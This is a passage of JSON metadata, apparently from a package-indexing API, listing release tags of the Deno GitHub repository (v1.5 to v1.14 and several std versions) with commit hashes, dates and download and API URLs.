:"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","